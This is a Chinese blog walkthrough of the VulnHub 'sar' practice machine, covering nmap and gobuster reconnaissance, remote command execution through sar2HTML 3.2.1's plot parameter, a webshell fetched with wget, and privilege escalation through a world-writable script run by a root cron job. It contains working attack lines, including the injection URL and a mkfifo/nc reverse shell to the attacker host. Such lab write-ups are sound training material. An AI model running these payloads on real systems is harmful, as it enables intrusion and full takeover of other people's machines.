vulnhub靶机2(easy难度):sar(远程代码执行,计划任务提权)

最新推荐文章于 2024-09-27 13:01:10 发布
最新推荐文章于 2024-09-27 13:01:10 发布
阅读量611 收藏 5
点赞数 18
分类专栏: vulnhub oscp-like靶场 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142027647
版权

端口

nmap主机发现
nmap -sn 192.168.18.0/24
​
Nmap scan report for 192.168.18.1
Host is up (0.00020s latency).
​
1是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.18.1 --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT   STATE    SERVICE
80/tcp open     http
​
发现开放1个端口
nmap -sT -sC -sV -O -p80 -oA nmap/scan 192.168.18.1详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
漏洞脚本扫描
nmap -script=vuln -oA nmap/vuln
​
| http-enum: 
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
​
发现敏感目录

立足点

网站信息收集
主界面就是ubuntu默认界面
robots.txt界面只有sar2HTML
phpinfo.php界面是phpinfo()信息,(有很多信息但是没有利用的地方)
目录扫描
gobuster dir -u http://192.168.18.1/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html --add-slash
​
发现根目录没有其他内容
隐藏目录发现
将收集到的sar2HTML作为网站目录查看,发现web应用程序
sar2html Ver 3.2.1
漏洞探测
searchsploit sar2html 3.2
​
sar2html 3.2.1 - 'plot' Remote Code Execution                                                                                                                           | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                                                                                                               | php/webapps/47204.txt
​
发现远程代码执行漏洞
​
请求http://192.168.18.1/sar2HTML/index.php?plot=;id
那么http://192.168.18.1/sar2HTML/index.php?plot=;后面的id将被解析为shell命令执行,并且执行结果有回显如下图

漏洞利用
这里我用的是python的脚本49344.py
​
需要输入url:http://192.168.18.1/sar2HTML/
上传webshell
网上找一个webshell,这里我找的php的webshell,文件命名为shell.php,记得将webshell的ip和port配置为攻击机器
​
上传webshell
攻击机器:python3 -m http.server
目标机器:wget http://192.168.18.47:8000/shell.php
​
利用webshell
攻击机器:nc -nvlp 449
目标机器:php shell.php
​
获取立足点用户:www-data

提权

配置错误提权
尝试sudo -l,发现没有权限
​
尝试find -perm -u=s -type f 2>/dev/null
查询suid有s位的文件,在gtfobins查询,发现没有可利用的点
​
尝试计划任务
cat /etc/crontab 
发现有root 权限运行的finally.sh文件
​
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
​
计划任务提权
看一下finally.sh内容,发现其运行了write.sh的脚本
​
finally.sh内容:
#!/bin/sh
​
./write.sh
​
看一下脚本权限
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rwxrwxrwx 1 www-data www-data   100 Sep  8 12:02 write.sh
​
发现我们对write.sh有绝对控制权
直接修改write.sh成以下内容,提权成功:
​
#!/bin/sh
​
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.18.47 4444 > /tmp/f
anddddoooo
关注
专栏目录
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 991
靶机精讲 之 SARvulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1241
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
[VulnHub靶机渗透] dpwwn: 1
人若无名,便可专心练剑
02-07 1694
靶机精讲之dpwwn1,vulnhub靶机,很能体现思路为王的一台机器,艰难的撕口子过程全程展现,只希望你感同身受。直接告诉你怎么撕口子,你肯定觉得很简单,但就是这个方式,如果你偏偏想不到,那这台机器你难以为继。希望你借此机器,能够感同身受地思考你的渗透优先级选择和路径权衡。mysql空密码撕口子,自动任务提权。你能想到吗?少年!
Vulnhub靶机——EMPIRE: LUPINONE(PiP命令提权
流水不争先,争的是滔滔不绝
04-09 1123
Vulnhub靶机——EMPIRE: LUPINONE——PiP命令提权(sudo)
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
Aluxian_的博客
06-24 1917
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 1013
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
Vulnhub靶机_RAGNAR LOTHBROK: 1
学术渣渣的博客
03-22 3976
靶机 RAGNAR LOTHBROK:1
Vulnhub靶机】Deathnote: 1死亡笔记
过期的秋刀鱼
09-16 1069
so Easy
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
Aluxian_的博客
06-23 1174
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度比较简单1.信息收集获取ip地址 和端口信息web等 查看F12源码信息‘2.enum4linux工具得使用(新知识点)用于账号枚举Brainfuck编码(经常做ctf得肯定知道)3.nc bash反弹命令(经常做渗透得话这一条肯定要背下来得,不然每次看命令没有提升。
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
VulnHub靶机渗透】六:DC-2
野原新之助
04-25 678
靶机设定线索引导用户得到相关信息,存在弱口令和sudo权限配置不当等安全问题。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8481
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
部标主动安全(ADAS+DMS)对接说明
最新发布
谁念西风独自凉
09-27 587
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1453
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 407
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1150
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
数据库的全透明加密和半透明加密主要是针对数据存储安全的不同处理方式
weixin_45699851的博客
09-25 349
对于应用程序来说,它处理的是密文,而加密过程和解密过程都是由数据库系统在后台自动完成的。这种模式下,开发者几乎察觉不到加密的存在,查询和操作的速度不会受到影响,因为大部分加密操作都在内存中快速完成。当数据被插入到数据库时,它会被加密,但对于读取数据的应用程序来说,它仍然能看到明文结果。这意味着应用程序需要知道如何处理加密后的数据,比如查询前先解密,然后对解密后的数据进行操作,再加密返回给客户端。这种方式牺牲了一些便利性,但可以提供更好的性能,因为它不需要每次查询都做完整的加密解密处理。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值